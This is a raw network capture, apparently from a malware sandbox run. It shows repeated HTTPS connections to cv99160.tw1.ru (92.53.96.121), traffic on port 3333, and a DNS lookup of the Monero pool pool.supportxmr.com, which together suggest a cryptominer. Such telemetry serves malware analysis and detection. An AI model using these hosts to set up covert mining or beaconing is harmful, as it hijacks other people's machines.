                                                                              Jun 23, 2024 11:33:18.605217934 CEST4434982792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:18.947642088 CEST4434982792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:18.947798014 CEST4434982792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:18.947904110 CEST49827443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:18.948091984 CEST49827443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:19.116978884 CEST49828443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:19.117079973 CEST4434982892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:19.117219925 CEST49828443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:19.117461920 CEST49828443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:19.117512941 CEST4434982892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:19.918046951 CEST4434982892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:19.919416904 CEST49828443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:19.919502020 CEST4434982892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:20.264550924 CEST4434982892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:20.264743090 CEST4434982892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:20.264826059 CEST49828443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:20.265007973 CEST49828443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:22.658951998 CEST49829443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:22.659044981 CEST4434982992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:56.689347029 CEST4434984892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:56.689420938 CEST49848443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:56.689681053 CEST49848443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:56.690586090 CEST49849443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:56.690643072 CEST4434984992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:56.690731049 CEST49849443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:56.690922976 CEST49849443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:56.690951109 CEST4434984992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:57.502159119 CEST4434984992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:57.503500938 CEST49849443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:57.503546953 CEST4434984992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:57.848778963 CEST4434984992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:57.848941088 CEST4434984992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:57.849013090 CEST49849443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:57.849241018 CEST49849443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:59.907587051 CEST49850443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:59.907665968 CEST4434985092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:33:59.907763958 CEST49850443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:59.908019066 CEST49850443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:33:59.908051968 CEST4434985092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:00.567837954 CEST333349843141.94.96.71192.168.2.4
                                                                              Jun 23, 2024 11:34:00.605400085 CEST4434985092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:00.606734991 CEST49850443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:00.606775999 CEST4434985092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:00.797518015 CEST498433333192.168.2.4141.94.96.71
                                                                              Jun 23, 2024 11:34:00.948918104 CEST4434985092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:00.949184895 CEST4434985092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:00.949265957 CEST49850443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:00.949323893 CEST49850443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:00.953295946 CEST49851443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:00.953387022 CEST4434985192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:00.953474998 CEST49851443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:00.954296112 CEST49851443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:00.954334021 CEST4434985192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:01.761260033 CEST4434985192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:01.762973070 CEST49851443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:01.763036966 CEST4434985192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:02.107873917 CEST4434985192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:02.108052015 CEST4434985192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:02.108237028 CEST49851443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:02.108381033 CEST49851443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:02.329333067 CEST49852443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:02.329402924 CEST4434985292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:02.329541922 CEST49852443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:02.329793930 CEST49852443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:02.329828978 CEST4434985292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:03.115473032 CEST4434985292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:03.116915941 CEST49852443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:03.116986036 CEST4434985292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:03.462579012 CEST4434985292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:03.462754011 CEST4434985292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:03.462827921 CEST49852443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:03.462970018 CEST49852443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:03.463848114 CEST49853443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:03.463932991 CEST4434985392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:03.464020014 CEST49853443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:03.464235067 CEST49853443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:03.464268923 CEST4434985392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:04.270893097 CEST4434985392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:04.272356033 CEST49853443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:04.272407055 CEST4434985392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:04.616580963 CEST4434985392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:04.616765022 CEST4434985392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:04.616839886 CEST49853443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:04.626365900 CEST49853443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:06.923109055 CEST49854443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:06.923216105 CEST4434985492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:06.923300982 CEST49854443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:06.923535109 CEST49854443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:06.923567057 CEST4434985492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:07.728576899 CEST4434985492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:07.730072021 CEST49854443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:07.730161905 CEST4434985492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:08.074604034 CEST4434985492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:08.074784994 CEST4434985492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:08.074863911 CEST49854443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:08.075172901 CEST49854443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:08.113475084 CEST49855443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:08.113575935 CEST4434985592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:08.113656998 CEST49855443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:08.113887072 CEST49855443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:08.113923073 CEST4434985592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:08.894851923 CEST4434985592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:08.896380901 CEST49855443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:08.896496058 CEST4434985592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:09.237664938 CEST4434985592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:09.237823009 CEST4434985592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:09.237987041 CEST49855443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:09.238075972 CEST49855443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:09.238889933 CEST49856443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:09.238923073 CEST4434985692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:09.239018917 CEST49856443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:09.239224911 CEST49856443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:09.239238024 CEST4434985692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:09.938922882 CEST4434985692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:09.940464020 CEST49856443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:09.940494061 CEST4434985692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:10.280594110 CEST4434985692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:10.280749083 CEST4434985692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:10.280811071 CEST49856443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:10.281048059 CEST49856443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:10.461802959 CEST49857443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:10.461893082 CEST4434985792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:10.462058067 CEST49857443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:10.462419987 CEST49857443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:10.462496996 CEST4434985792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:11.163346052 CEST4434985792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:11.164943933 CEST49857443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:11.165029049 CEST4434985792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:11.507045031 CEST4434985792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:11.507195950 CEST4434985792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:11.507292032 CEST49857443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:11.507597923 CEST49857443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:11.508431911 CEST49858443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:11.508541107 CEST4434985892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:11.508625031 CEST49858443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:11.508867979 CEST49858443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:11.508904934 CEST4434985892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:12.057231903 CEST333349843141.94.96.71192.168.2.4
                                                                              Jun 23, 2024 11:34:12.209230900 CEST4434985892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:12.210599899 CEST49858443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:12.210700989 CEST4434985892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:12.297403097 CEST498433333192.168.2.4141.94.96.71
                                                                              Jun 23, 2024 11:34:12.551124096 CEST4434985892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:12.551299095 CEST4434985892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:12.551412106 CEST49858443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:12.551774979 CEST49858443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:14.170010090 CEST49859443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:14.170048952 CEST4434985992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:14.170115948 CEST49859443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:14.170350075 CEST49859443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:14.170367956 CEST4434985992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:15.123809099 CEST4434985992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:15.125180006 CEST49859443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:15.125196934 CEST4434985992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:15.470834970 CEST4434985992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:15.471044064 CEST4434985992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:15.471115112 CEST49859443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:15.471242905 CEST49859443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:15.472158909 CEST49860443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:15.472249985 CEST4434986092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:15.472349882 CEST49860443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:15.472538948 CEST49860443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:15.472560883 CEST4434986092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:16.258766890 CEST4434986092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:16.260312080 CEST49860443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:16.260380030 CEST4434986092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:16.601197004 CEST4434986092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:16.601438046 CEST4434986092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:16.601752996 CEST49860443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:16.601840019 CEST49860443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:16.749464035 CEST49861443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:16.749522924 CEST4434986192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:16.749749899 CEST49861443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:16.749861956 CEST49861443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:16.749875069 CEST4434986192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:17.546209097 CEST4434986192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:17.548141956 CEST49861443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:17.548156977 CEST4434986192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:17.889556885 CEST4434986192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:17.889720917 CEST4434986192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:17.889893055 CEST49861443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:17.890002012 CEST49861443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:17.890965939 CEST49862443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:17.890999079 CEST4434986292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:17.891069889 CEST49862443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:17.891334057 CEST49862443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:17.891347885 CEST4434986292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:18.590137959 CEST4434986292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:18.591664076 CEST49862443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:18.591687918 CEST4434986292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:18.931818008 CEST4434986292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:18.932018042 CEST4434986292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:18.932097912 CEST49862443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:18.932320118 CEST49862443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:20.130302906 CEST49863443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:20.130394936 CEST4434986392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:20.130475998 CEST49863443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:20.130698919 CEST49863443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:20.130736113 CEST4434986392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:20.956207037 CEST4434986392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:20.957842112 CEST49863443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:20.957900047 CEST4434986392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:21.301021099 CEST4434986392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:21.301189899 CEST4434986392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:21.301362991 CEST49863443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:21.301480055 CEST49863443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:21.302395105 CEST49864443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:21.302445889 CEST4434986492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:21.302537918 CEST49864443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:21.302759886 CEST49864443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:21.302792072 CEST4434986492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:53.998790026 CEST4434988492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:54.000314951 CEST49884443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:54.000358105 CEST4434988492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:54.340581894 CEST4434988492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:54.340749979 CEST4434988492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:54.340814114 CEST49884443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:54.341059923 CEST49884443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:55.552200079 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:55.552289009 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:55.552360058 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:55.552588940 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:55.552624941 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.341789007 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.343276024 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.343338013 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.682631016 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.682894945 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.682960033 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.683053970 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.683887005 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.683942080 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.684020996 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.684233904 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.684266090 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:57.478069067 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:57.479537964 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:57.479598045 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:57.825534105 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:57.825728893 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:57.825808048 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:57.826025963 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:59.017365932 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:59.017461061 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:59.017616034 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:59.017822027 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:59.017857075 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:59.728012085 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:59.729469061 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:59.729526043 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.072411060 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.072619915 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.072690964 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.072839022 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.073687077 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.073740959 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.073818922 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.074038029 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.074069023 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.785201073 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.786756992 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.786842108 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:01.126866102 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:01.127049923 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:01.127126932 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:01.127403975 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:02.557676077 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:02.557776928 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:02.557861090 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:02.558094025 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:02.558132887 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.277863979 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.279544115 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.279596090 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.626966000 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.627115011 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.627207041 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.627398014 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.628283024 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.628355026 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.628437042 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.628681898 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.628726959 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:04.352106094 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:04.353596926 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:04.353646994 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:04.698201895 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:04.698367119 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:04.698597908 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:04.698709011 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:06.968867064 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:06.968960047 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:06.969042063 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:06.969398975 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:06.969434977 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:07.694642067 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:07.696079016 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:07.696161032 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.040169001 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.040322065 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.040409088 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.040549040 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.041356087 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.041450977 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.041537046 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.041807890 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.041845083 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.747780085 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.749325991 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.749387980 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:09.091356039 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:09.091531992 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:09.091597080 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:09.091851950 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:09.429047108 CEST333349843141.94.96.71192.168.2.4
                                                                              Jun 23, 2024 11:35:09.500463009 CEST498433333192.168.2.4141.94.96.71
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Jun 23, 2024 11:31:10.780622959 CEST  61906        53         192.168.2.4  1.1.1.1
Jun 23, 2024 11:31:10.830748081 CEST  53           61906      1.1.1.1      192.168.2.4
Jun 23, 2024 11:31:12.198589087 CEST  49698        53         192.168.2.4  1.1.1.1
Jun 23, 2024 11:31:12.209815979 CEST  53           49698      1.1.1.1      192.168.2.4

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Jun 23, 2024 11:31:10.780622959 CEST  192.168.2.4  1.1.1.1  0x802e    Standard query (0)  cv99160.tw1.ru       A (IP address)  IN (0x0001)  false
Jun 23, 2024 11:31:12.198589087 CEST  192.168.2.4  1.1.1.1  0x5123    Standard query (0)  pool.supportxmr.com  A (IP address)  IN (0x0001)  false

Timestamp                             Source IP    Dest IP      Trans ID  Reply Code    Name                    CName                   Address        Type                    Class        DNS over HTTPS
Jun 23, 2024 11:31:10.830748081 CEST  1.1.1.1      192.168.2.4  0x802e    No error (0)  cv99160.tw1.ru                                  92.53.96.121   A (IP address)          IN (0x0001)  false
